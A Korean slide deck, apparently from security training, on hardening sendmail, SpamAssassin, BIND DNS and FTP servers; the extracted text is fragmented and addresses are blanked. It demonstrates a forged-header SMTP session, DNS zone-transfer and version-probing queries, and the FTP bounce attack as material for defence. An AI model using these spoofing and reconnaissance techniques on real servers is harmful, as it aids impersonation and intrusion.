77 Mail Header 변조 # telnet tt.co.kr 25 Trying Connected to tt.co.kr ( ). Escape character is '^]'. 220 www10.tt.co.kr ESMTP Today and Tomorrow( HELO kisa.or.kr 250 www10.tt.co.kr Hello [ ], pleased to meet you MAIL FROM:antihong@antihong.com antihong@antihong.com... Sender ok RCPT TO:antihong@tt.co.kr antihong@tt.co.kr... Recipient ok DATA 354 Enter mail, end with "." on a line by itself Received: from antihong.com (antihong.com [ ]) by tt.co.kr (8.11.6) id 004A21 Received: from center.kisa.or.kr (center.kisa.or.kr [ ]) by antihong,com (8.14.5) id 004A21 From: root@kisa.or.kr (KISA) To: antihong@antihong.org Date: Tue, Mar :36:14 KST Message-Id: <rth @center.kisa.or.kr> X-Mailer: Aantihong v1.22 Subject: Hello?? Hello j5313eo25017 Message accepted for delivery QUIT 77

78 78

79 Queue 파일예 H?P?Return-Path: < 갾 > H??Received: from tuji.net ([ ]) (authenticated) by smtp.xxxxxx.co.kr (8.11.6/8.11.6) with ESMTP id j48drud04861; Sun, 8 May :53: H?M?Message-Id: < j48DruD04861@smtp.xxxxxx.co.kr> H??From: "sardasda" <sardasda@hotmail.com> H??To: "tmfdktkfkdgo" <tmfdktkfkdgo@hanmir.com> H??Subject: 무조건누구라도바로빌려드립니다가장싸게무조건바로말만하세요 79

80 SMTP relay 허용문제 (IP 기반인증 ) /etc/mail/access 파일에서제어 spammer@aol.com REJECT abc.com REJECT Goodman@abc.com OK test.com 550 No Spam Here REJECT RELAY access_db 기능들 OK : 다른기능에의해거부되도록설정된곳에서 mail 이와도받는다. RELAY : relay 허용 REJECT : mail 수신거부, 거부 message 를송신자에게보냄 DISCARD : 수신후삭제한다. SMTP-code message : RFC821 에명시되어있는 smtp code 와상대에게보내질 message 작성후 /etc/mail 에서 makemap hash /etc/mail/access < /etc/mail/access 로 DB 화. 80

81 SMTP relay 허용문제 (id/pw 기반인증 ) /etc/mail/sendmail.mc 에서 dnl 부분삭제 dnl define(`confauth_mechanisms', `LOGIN PLAIN DIGEST-MD5 CRAM-MD5')dnl dnl TRUST_AUTH_MECH(`LOGIN PLAIN DIGEST-MD5 CRAM-MD5')dnl Delete till New Line 의약자 ( 불필요한공백문자 ( 탭, 공백 ) 을제거 ) # m4 /etc/mail/sendmail.mc > /etc/sendmail.cf 로 sendmail.cf 다시생성 이후보내는메일서버에서서버내 id/pw 로사용자인증가능 릴레이여부확인 : blacklist 여부확인 81

82 Sendmail 설정을통한서비스제한 sendmail.cf 설정 # Limit maximum outgoing message size O MaxMessageSize= # Limit maximum incoming message size. Mlocal, P=/usr/bin/procmail, S=10/30, R=20/40, M= , T=DNS/RFC822/X-Unix, A=procmail -Y -a $h -d $u # maximum number of recipients per SMTP envelope O MaxRecipientsPerMessage=20 # SMTP initial login message (old $e macro) #O SmtpGreetingMessage=$j Sendmail $v/$z; $b O SmtpGreetingMessage=$j welcome to HanMail.Net(tm) #O QueueDirectory=/var/spool/mqueue O QueueDirectory=/var/spool/mqueue/q* 82

83 스팸, 바이러스대응방안 대부분의상용제품이 MX 레코드를이용한 spamwall 또는 viruswall 이용 일부는메일서버에직접탑재하는형태로사용 anti-바이러스 : anti-스팸 : 83

84 anti-spam 솔루션활용 # cat /etc/procmailrc :0fw: spamassassin.lock * < /usr/bin/spamc -u $LOGNAME user_prefs 파일허용 :0 * ^X-Spam-Level: \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* /var/spool/mail/spam-mail :0 B * Content-Disposition: attachment * name=.*\.(com pif scr bat lnk shf cpl cmd vbs) { # Stick it somewhere :0 B: /dev/null } 84

85 anti-spam 솔루션활용 설정파일 (1) /usr/share/spamassassin/*.cf (2) /etc/mail/spamassassin/*.cf (3) ~$HOME/.spamassassin/user_prefs # cat /etc/mail/spamassassin/*.cf required_score 8.0 rewrite_header Subject [SPAM] blacklist_from *@test.com whitelist_from *@myfriend.co.kr allow_user_rules 1 룰예 : header L_s_casino Subject =~ /c[a\@]sin[o0]/i score L_s_casino 0.3 describe L_s_casino Subject mentions a casino 스팸룰파일 : 85

86 직접룰설정해보기 정상 hanmail Received: from ([ ]) by relay.tt.co.kr ; Thu, 8 Jul :55: (KST) Received: from wwl293.hanmail.net ([ ]) by smail-105.hanmail.net (8.12.1/8.9.1) with ESMTP id i685tldt013998; Thu, 8 Jul :55: Received: (from hanadmin@localhost) by wwl293.hanmail.net (8.12.9/8.9.1) id i685tdc for <antihong@tt.co.kr>; Thu, 8 Jul :55: 스팸 hanmail Received: from ([ ]) by www10.tt.co.kr (8.11.6/8.11.6) with ESMTP id i86e9eo06285; Mon, 6 Sep :09: header LOCAL_DAUM_RULE Received =~ /(from hanadmin\@localhost)/ score LOCAL_DAUM_RULE -5.5 describe LOCAL_DAUM_RULE This is a normal daum rule 86

87 직접룰설정해보기 정상 paran mail Received: from system.tt.co.kr ([ ]) by www10.tt.co.kr (8.11.6/8.11.6) with ESMTP id i87blqh05009 for Tue, 7 Sep :21: Received: from mail12.paran.com ([ ]) by system.tt.co.kr (8.11.6/8.10.1) with SMTP id i87blsr26079 for <antihong@tt.co.kr>; Tue, 7 Sep :21: Message-Id: < i87BLsR26079@system.tt.co.kr> Received: from ([ ]) by mail12.paran.com (ParanMail Web 0.1) with ESMTP for <antihong@tt.co.kr>; Tue, 7 Sep :22: header LOCAL_PARAN_RULE Received =~ /ParanMail Web/ score LOCAL_PARAN_RULE -10 describe LOCAL_PARAN_RULE This is a normal PARAN rule 87

88 #netstat lnp tcp :783 LISTEN 17468/spamd -d -c 옵션에서 s null 시로그에남지않음 # tail f /var/log/maillog spamd[22769]: connection from mail02.tt.co.kr [ ] at port spamd[22769]: info: setuid to tt_1318kawe_com_01 succeeded spamd[22769]: processing message <FBBZYXCWUCBFXWRNMLWQMBW@yahoo.com> for tt_1318kawe_com_01:2731. spamd[19783]: processing message < j4721XVC023718@mail02.tt.co.kr> for wooji2:7177. spamd[22769]: identified spam (26.9/8.0) for tt_1318kawe_com_01:2731 in 0.2 seconds, 1856 bytes. spamd[22769]: result: Y 26 - CG_hm_MSGID_SPAM2,FORGED_MUA_OUTLOOK,FORGED_OUTLOOK_HTML,HE AD_ILLEGAL_CHARS,HTML_50_60,scantime=0.2,size=1856,mid=<FBBZYXCW UCBFXWRNMLWQMBW@yahoo.com> 88

89 대용량메일서버에서의활용 89

90 큐잉서버활용 # server.com mx server.com. 1D IN MX 30 mail3.server.com. server.com. 1D IN MX 10 server.com. server.com. 1D IN MX 20 mail2.server.com. server.com. 1D IN A mail2.server.com. 1D IN A mail3.server.com. 1D IN A

91 SURBL 기능활용 RBL (Realtime Blackhole List): list of IP addresse of sources of unsolicited commercial and bulk RSS (Relay Spam Stopper): list of IP addresses of "open relay" mail servers OPS (Open Proxy Stopper): list of IPs that have been used, as an open proxy Contains False Positive SURBL - Spam URI Realtime Blocklists( ; RBL designed to be used to block or tag spam based on URIs (usually their domain names) contained within the message body False Positive rate : % and need less memory using DNS cache. 91

92 SURBL 기능설정 (at SpamAssassin 3) enable Network test install lastest Net::DNS module SURBL List : sc.surbl.org - SpamCop message-body URI domains - thresholding of the minimum number of reports and whitlist: to reduce false positive ws.surbl.org - sa-blacklist domains as a SURBL be.surbl.org - BigEvil and MidEvil domains (deprecated; use ws.surbl.org instead) ob.surbl.org - OutBlaze spamvertised sites ab.surbl.org - AbuseButler spamvertised sites multi.surbl.org - Combined SURBL list ph - Phishing data source jp - jwspamspy + Prolocation data source 92

93 Local SURBL using bind install the lastest bind and rsync mkdir /var/named/surbl adding /etc/named.conf (all SURBL: zone "sc.surbl.org" { type master; file "surbl/sc.surbl.org.bind"; }; zone "ws.surbl.org" { type master; file "surbl/ws.surbl.org.bind"; }; zone ab.surbl.org" { type master; file "surbl/ab.surbl.org.bind"; }; 93

94 Local SURBL using bind /etc/cron.daily/rsync #!/bin/sh rsync -t SURBL_Rsync_Host::surbl/*.bind /var/named/surbl killall -HUP named local.cf score URIBL_AB_SURBL 4 score URIBL_OB_SURBL 4 score URIBL_PH_SURBL 4 score URIBL_SC_SURBL 4 score URIBL_WS_SURBL 3 94

95 SURBL result RBL 조회 : 95

96 새로운공격기법에대한대응 dictionary attack joe job attack dictionary attack 의로그 Jun 2 02:20:22 www sendmail[12366]: j51hkmo12366: <kaa09287@tt.co.kr>... User unknown Jun 2 02:20:22 www sendmail[12366]: j51hkmo12366: <kaa10764@tt.co.kr>... User unknown Jun 2 02:20:22 www sendmail[12366]: j51hkmo12366: <kaa12561@tt.co.kr>... User unknown Jun 2 02:20:22 www sendmail[12366]: j51hkmo12366: <kaa15230@tt.co.kr>... User unknown Jun 2 02:20:22 www sendmail[12366]: j51hkmo12366: <kaa15645@tt.co.kr>... User unknown 96

97 새로운공격기법에대한대응 메시지당동시수신자수제한 (sendmail.cf) # maximum number of recipients per SMTP envelope # O MaxRecipientsPerMessage=100 기본값 : 무제한 # maximum number of recipients per SMTP envelope O MaxRecipientsPerMessage=10 # telnet mail.test.com 25 Trying Connected to mail. Escape character is '^]'. 220 mail.test.com ESMTP ehlo sis mail.test.com Hello mail.test.com [ ], pleased to meet you mail from:<test@abc.com> <test@abc.com>... Sender ok rcpt to:<first@abc.com> <first@abc.com>... Recipient ok rcpt to:<second@abc.com> Too many recipients 97

98 새로운공격기법에대한대응 에러발생유저제한 (sendmail.cf) User unknown이일정이상되면나머지 RCPT 응답을느리게 (1초동안중지 ) 반응 # limit the rate recipients per SMTP envelope are accepted # once the threshold number of recipients have been rejected O BadRcptThrottle=2 기본값 : 제한없음 ehlo sis mail.test.com Hello mail.test.com [ ], pleased to meet you mail from:<test@abc.com> <test@abc.com>... Sender ok rcpt to:<root1@abc.com> <root1@abc.com>... User unknown rcpt to:<root12@abc.com> <root12@abc.com>... User unknown rcpt to:<root122@abc.com> <root122@abc.com>... User unknown <-- 이후부터는느리게응답 Jun 2 17:26:32 mail sendmail[10575]: j528qbpt010575: [211.xx.xx.xx]: Possible SMTP RCPT flood, throttling. 98

99 새로운공격기법에대한대응 connection rate 제한 (access) 이중에는1분 (60s) 당클라이언트 IP에대한connection 수를제한시간은 sendmail.cf에서정의 # Width of the window #O ConnectionRateWindowSize=60s /etc/mail/access 예 ClientRate: ClientRate: ClientRate: 5 >>> MAIL From:<root@abc.com> SIZE= <root@abc.com>... Sender ok >>> RCPT To:<root@antihong.com> Connection rate limit exceeded. rate 초과시서버응답 >>> QUIT 99

100 새로운공격기법에대한대응 동시접속제한 (access) 동시에세션이맺어질수있는수를제한 /etc/mail/access 예 ClientConn: ClientConn: ClientConn: 5 # telnet mail.test.com 25 Trying mail.test.com... Connected to mail.test.com. Escape character is '^]' Too many open connections. 100

101 새로운공격기법에대한대응 동시접속제한 (iptables 활용 ) $IPTABLES -A INPUT -p tcp -s dport 25 m state state NEW -j ACCEPT $IPTABLES -A INPUT -p tcp --syn --dport 25 -m connlimit --connlimit-above 3 -j DROP $IPTABLES -A INPUT -m recent --name spammer --rcheck --seconds 300 -j DROP $IPTABLES -A INPUT -p tcp --syn --dport 25 -m connlimit --connlimit-above 3 -m recent --name spammer --set -j DROP 101

102 새로운공격기법에대한대응 greet_pause (access)-against slamming 220 tt.co.kr ESMTP greet message >>> EHLO tt.co.kr 250-vwall.tt.co.kr Hello localhost.localdomain [ ], pleased to meet you >>> MAIL Sender ok >>> RCPT Recipient ok >>> DATA GreetPause: GreetPause: # 9s GreetPause: 1000 # 1s 102

103 새로운공격기법에대한대응 # telnet mail.test.com 25 Trying mail.test.com... Connected to mail.test.com Escape character is '^]'. ehlo localhost slamming 과같이 greet 메시지를기다리지않고바로 ehlo 등다음단계로진행하는경우 554 mail.test.com ESMTP not accepting messages 250-mail.test.com Hello [ xx.xx], pleased to meet you 250 ENHANCEDSTATUSCODES mail from:<abc@abc.com> Command rejected rcpt to:<root@abc.com> Command rejected /var/log/maillog Jun 2 18:43:59 mail sendmail[10696]: j529huy : rejecting commands from [ xx.xx] due to pre-greeting traffic 103

104 joe job attack 유래 : 1996년호스팅업체인 joes.com 에서스팸메일발송업체차단 이에대한앙갚음으로 joes.com에서스팸을발송한것처럼대량스팸메일발송 joes.com에대한도덕적, 물질적타격정의 : 앙갚음을하려고하거나악의적인의도를가지고스팸메일을발송하여실제발송자와전혀관계없는제 3자가마치스팸을발송한것처럼가장하는형태의공격. 신용사기인 scam과개인정보수집을목적으로하는 phishing과다소의의미차이있음 104

105 Return-Path attack 에대한대응방법 /etc/mail/virtusertable 에설정 abc xyz user2 error:5.7.0:550 No such user here ; no use server resource # cat ~unknown/.forward /dev/null 105

106 기타솔루션 (greylisting) 작동원리 : 3 가지변수 (IP, 발신자, 수신자 ) 이용 milter(mail filter) function required. 메일전송 400 계열에러시 queue 에저장후재전송시도 정상 mail system 4xx Error : try again later queue 에저장후메일재전송 OK: 메일수신 이후해당정보를통해발송되는메일은자동으로일정시간동안 whitelist 에등록 greylist 메일서버 106

107 spammer 메일전송 Error : try again later 메일재전송하지않음스패머로부터오는메일은자동으로차단 greylist 메일서버 Incoming mail vs. Spam during last 12 months 107

108 >>> HELO antihong.com 250 tt.co.kr Hello [antihong.com], pleased to meet you >>> MAIL graylisted - please try again later antihong@tt.co.kr... Deferred: <root@antihong.com>... graylisted please try again later Closing connection to tt.co.kr /var/log/maillog Jun 8 17:34:59 tt sendmail[31450]: j588ywg : Milter: from=<root@antihong.comr>, reject= graylisted - please try again later some problem -. Some MTA doesn t do as SMTP standard -. Some spammer using queue and retry function. Customizing required!! 108

109 DNS 서버보안 목차 Bind DNS 를중심으로 DNS 보안이왜중요한가? DNS protocol 의보안취약성 Bind DNS 의버전 DNS 서버의보안 DNS 서버의물리적 / 용도에따른분리 DNS 서버의서비스제한 (ACL) TSIG 를활용한보안강화 Bind 버전정보이슈 DNS 방화벽정책기타 DNS 이슈 Root DNS 에대해 109

110 DNS 보안이왜중요한가? DNS 자체취약성 * 시스템취약성 TOP20 UNIX 분야 1 위 * 자체취약성으로인한보안문제유발 : 75 건 : 33 건 DNS 는인터넷서비스의근간 * Forward Lookup (Host IP) * Reverse Lookup (IP Host) UNKNOWN yahoo.com 110

111 DNS protocol 의취약성예 1. 공격자는특정도메인 (microsoft.com) 에대한많은질의를한다. 2. 질의한도메인 (microsoft.com) 에대해위조된응답을보낸다. 3. 이후 client 가 microsoft.com 도메인에대한정상적인질의를한다. 4.DNS 서버는 1-2 번공격에의해잘못된정보를제공한다. 111

112 Bind 및 DNS 버전 Bind 4.x 개발중단. Bind 8.x root DNS 및대부분의 DNS 에서사용. 일반적인 Query 응답율가장좋음. No new feature,only major security patch. Bind 9.x DNSSEC 등보안을고려한 code-rewrite. 기능개선및 multithread 지원 (answering queries while loading zones) djbdns 보안을고려한설계. 그러나 DNS protocol 을따르지않음 (zone-transfer, tcp 53 지원 X, 기타새로운기능제공계획없음 ) Nsd(Name Server Daemon) 위임도메인에대한 Query 응답율가장좋음, Authoritative-only. 112

113 master/slave DNS 이해 긍정적캐싱 / 부정적캐싱문제 primary, secondary? (X) 1 차, 2 차? (X) master, slave! (O) 잘못된상식! master 가다운되면 backup DNS 인 slave 가응답한다? (1) 최상위 Root DNS 의경우 A.root-servers.net : master B-M.root-servers.net : slave (2).kr 최상위 DNS 의경우 a.dns.kr : master b~g.dns.kr : slave master, slave 의차이점 단지서버가어디에서데이터를얻어오는가에따른분류일뿐! Slave 가백업은아님!! 113

114 DNS 서버의용도에따른분리 Advertising : 위임권한이있는도메인에대한질의만응답 Resolving : 모든도메인에대한질의에응답 # nslookup nog.or.kr. nis.dacom.co.kr Server: nis.dacom.co.kr Address: Name: nog.or.kr Served by: - J.ROOT-SERVERS.NET # nslookup nog.or.kr. ns.dacom.co.kr Server: ns.dacom.co.kr Address: Name: nog.or.kr Address: K.ROOT-SERVERS.NET L.ROOT-SERVERS.NET

115 DNS 서비스제한 -recursion Recursion 제한필요성 (1) DoS 공격차단 (2) spoofing 및 cache poisoning 차단 Recursion 제한설정법 options { allow-recursion { ; /24; }; }; 또는 acl internal { ; /24; }; options { allow-recursion {internal; }; }; 순환질의예 recursion 여부확인 : 115

116 DNS 서비스제한 -zone transfer * zone-transfer 를허용하였을경우 (1) 시스템자원과 bandwidth 를모두사용하여 DoS 로악용될수있는여지가있음. (2) 호스트이름과 IP매핑등민감한정보유출가능성. * zone-transfer 제한 slave DNS IP (1) master-slave 사용시 options { allow-transfer { ; }; }; options { allow-transfer { none; }; }; (2) Only master 만사용시 options { allow-transfer { none; }; }; (3) 특정도메인만제한시 zone "server.com" { type master; file "server.zone"; allow-transfer { ; }; }; zone-transfer 실행예 [root@dns /root]# xxxxx.ac.kr axfr ; <<>> DiG 8.2 xxxxx.ac.kr axfr ; (1 server found) $ORIGIN 1H IN SOA ns root.ns ( ; serial 6H ; refresh 10M ; retry 1W ; expiry 1H ) ; minimum 1H IN NS ns 1H IN NS ns2 1H IN MX 0 smtp 1H IN MX 10 smtp2 1H IN A xxx.xxx.6.20 ling 1H IN A xxx.xxx script 1H IN A xxx.xxx mobicomm 1H IN A xxx.xxx knuth 1H IN A xxx.xxx maynard 1H IN A xxx.xxx 이하중략 116

117 TSIG 를활용한보안강화 * TSIG : Transaction SIGnature 의약자양서버간사전에공유된암호키를이용한트랜잭션으로 IP 기반의접근통제보다안전하고효율적 ( 무결성및인증 ) * master /slave 2 대이상사용시에만필요 * 양서버간시간동기화중요 (5 분이상차이시 expired) * [root@dns root]# dnssec-keygen -a hmac-md5 -b 128 -n HOST host1- host2. Khost1-host 암호화키가저장된파일 128bit(16byte) 의 hmac-md5 키를생성하고그결과를 base-64 로인코딩 IP 기반접근통제예 ) allow-transfer { ; ); TSIG 기반접근통제예 ) allow-transfer { key host1-host2; ); 117

118 TSIG 를활용한 zone-transfer 예 *master 서버에서설정 key host1-host2. { algorithm hmac-md5; secret "+NLqXOznZv4jhV5amBL2yg=="; }; zone "server.com" { type master; file "server.zone"; allow-transfer { key host1-host2.; }; }; * slave 서버에서설정 key host1-host2. { algorithm hmac-md5; secret "+NLqXOznZv4jhV5amBL2yg=="; }; server { // 는 master DNS 의 IP keys { host1-host2.; }; }; zone "server.com" { type slave; masters { ;}; file "server.zone"; }; 118

119 Bind 버전정보제한 * Bind 버전스캔은공격에대한사전단계 * Bind 버전질의방법 (1) dig 을이용하는방법 # txt chaos version.bind (2) nslookup 을이용하는방법 # nslookup -q=txt -class=chaos version.bind ns.server.com version No!!"; kisa.or.kr "I don`t know name.kt.co.kr "8.3.4-REL" nis.dacom.co.kr "Happy Day!" ns.dacom.co.kr "NO!!!" ns.kornet.net "Cyber World Leader Kornet!" ns.thrunet.com "8.3.3-REL-IDNS" ns.daum.net "8.4.1-REL" ns.netfos.net "Hanaro Telecom Inc." ns.kaist.ac.kr "BIND 8.1.2" ercc.snu.ac.kr "ngdn " ns1.nic.or.kr "8.4.1-REL" ns.imbc.com "8.2.3-REL" ns.chosun.com "8.3.1-REL" ns1.nate.com BIND P5" nic.samsung.co.kr "ngdn " prmns.lg.co.kr "8.3.4-REL" a.root-servers.net "VGRS2" b.root-servers.net "8.2.5-REL" c.root-servers.net "8.4.0-RC1" d.root-servers.net "8.3.4-REL" e.root-servers.net "8.3.4-REL" h.root-servers.net "8.3.6-REL" i.root-servers.net "8.3.4-REL" j.root-servers.net "VGRS2" l.root-servers.net "named-8.4.1" m.root-servers.net "8.3.6-REL" 119

120 view 를이용한 DNS 분해 acl "secure-zone" { /24; }; view "internal" { // 내부사용자를위한설정 match-clients { "secure-zone"; }; zone "server.com" { type master; file "server_com_secure.zone"; }; }; view "external" { // 외부사용자를위한설정 match-clients { any; }; recursion no; // 외부에서의 recursion을제한 zone "server.com" { type master; file "server_com_external.zone"; // 외부에보이는 zone 설정 }; }; 120

121 Reverse DNS in-addr.arpa ptr # -x 질의과정추적 # -x trace 121

122 Reverse DNS 를하지않도록 zone "in-addr.arpa" { type master; file "rev.rev"; }; ============================================ $TTL IN SOA ns.test.co.kr. root.test.co.kr. ( ; Serial ; Refresh ; Retry ; Expire ) ; Minimum IN NS ns.test.co.kr IN PTR host.test.co.kr. 122

123 DNS 방화벽정책 *udp,tcp53 번의용도 udp 53 : 일반적인 DNS 질의, 전송 tcp 53 : (1) Zone transfer 와같이많은용량을전송시 (2) udp 53 의메시지사이즈가 484 byte 초과시 tcp 로재질의 * tcp 53 을허용할것인가? DNS servers MUST support UDP and SHOULD support TCP (RFC 1123) server.com. any +tcp server.com. any +notcp * 허용할소스포트 : 1024:65535, 53 -bind 4.x 에서는 source port 로 53 사용. - query-source address * port 53 ; 과같이소스포트지정가능 (only udp) 123

124 기타 DNS 이슈 -root Server * 2002 년 10 월 21 일 1 시간여동안 root 서버에대한 icmp 기반의 DDoS 공격발생. 9 개 root 서버에영향 일부접속지연등의현상발생 전세계적으로 13 개의 root-server 가운영중. gtld (com/net) DNS 도전세계적으로 13 개가운영중 VeriSign 에의해운영 현재 7 개의.KR 네임서버가운영 KRNIC 에서 2 대운영 (Primary) 4 개의기관에서 5 대운영 (Secondary) 124

125 FTP 서버보안 File Transfer Protocol IETF RFC 959 파일전송을위한인터넷표준 client Control connection (FTP commands) (FTP replies) data connection Server 파일을전송하기위해 2개의 TCP 연결을동시에사용 (1) 제어연결 (control connection): 클라이언트에서의서버로의명령과서버의응답을위한제어연결 (21번포트 ) (2) 데이터연결 (data connection): 파일이전송될때생성되는데이터연결 FTP 명령어 - 3 또는 4 바이트의 ASCII 대문자로구성되며, 어떤것은옵션변수를갖고있음 FTP 응답 - 3 바이트의 ASCII 숫자와숫자뒤옵션메시지로구성 [ 예 ] 331 Username OK, password required 125 Data connection already open: transfer starting 425 Can t open data connection 125

126 Ftp 전송모드에대한이해 두개의포트사용 21 : command, control 포트 20 또는 1024이후 : data 포트 두개의모드가능 각기모드는 Client 에서결정 Active : 21, 20번포트사용 Passive : 21, 1024 이후의포트사용 Active 와 Passive 모드의장단점은무엇인가? * Active : 두개의포트만열면된다. 클라이언트에방화벽이설치되어있다면? * Passive : 1024 이후의포트모두를열어야한다. 서버에서 Passive 에서사용할수있는포트제한. 126

127 Ftp 전송모드에대한이해 (1) Active FTP Server Client <---- 두번째포트알려줌 수신확인 두번째포트연다 < 수신확인

128 Ftp 전송모드에대한이해 (2) Passive FTP Server Client <---- 두번째포트질의 두번째포트알려줌 - < 명령채널 수신확인

129 (1) Active FTP # ftp -d server Name (server:root): cisco ---> USER cisco 331 Password required for cisco. Password: ---> PASS XXXX 230 User cisco logged in. ---> SYST 215 UNIX Type: L8 Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la ---> PORT 192,168,1,3,173, ,168,1,3 : IP주소, 173,114 : 포트 200 PORT command successful. 173* = > LIST -la 150 Opening ASCII mode data connection for file list. 1:45: eth0 < SERVER.ftp-data > : S : (0) win 5840 <mss 1460> (DF) 3 단계과정 129

130 (2) Passive FTP # ftp -p -d server Name (server:root): cisco ---> USER cisco 331 Password required for cisco Password: ---> PASS XXXX 230 User cisco logged in. ---> SYST 215 UNIX Type: L8 Remote system type is UNIX. Using binary mode to transfer files. ftp> ls ---> PASV 227 Entering Passive Mode (server,205,115). Server: IP 주소, 205,115 : 포트 ---> LIST 205* = Opening ASCII mode data connection for file list eth0 > > server.52595: S : (0) win 5840 <mss 1460> (DF) 3 단계과정 130

131 FTP 공격유형 (1) FTP Bounce Attack FTP 세션에서클라이언트가포트 21 번연결을요구하고, 핸드쉐이크 (handshake) 가이루어지면클라이언트는데이터전송을위한포트정보를서버로보낸다. 그러나이러한행동은 attacker 는시작한클라이언트가아닌 attacker 가선택한시스템상의포트에연결할수있음을의미 즉, FTP 서버는클라이언트가지시한곳으로자료를전송할때, 그목적지가 어떤곳 인지는검사하지않음. 이는 FTP 서버의취약성보다는 FTP 프로토콜의설계상문제점임 [ 공격예 ] 거짓편지, 포트스캐닝, 방화벽을넘어접근하기 client PORT 172,16,14,7,4,150 Server RETR :

132 Proftpd 보안 proftpd : -wu-ftpd의대안으로개발 - 매우안정하고빠름 -xinetd/ standalone 형태로작동가능 ftp접속시확인설정 1 /etc/passwd, /etc/shadow에사용자계정이있는지검사. 2 /etc/ftpusers에사용자 id가있으면거부. 3 /etc/shell에등록되지않은쉘을사용하는유저는접근거부 RequireValidShell off ( 허용하려면..) 132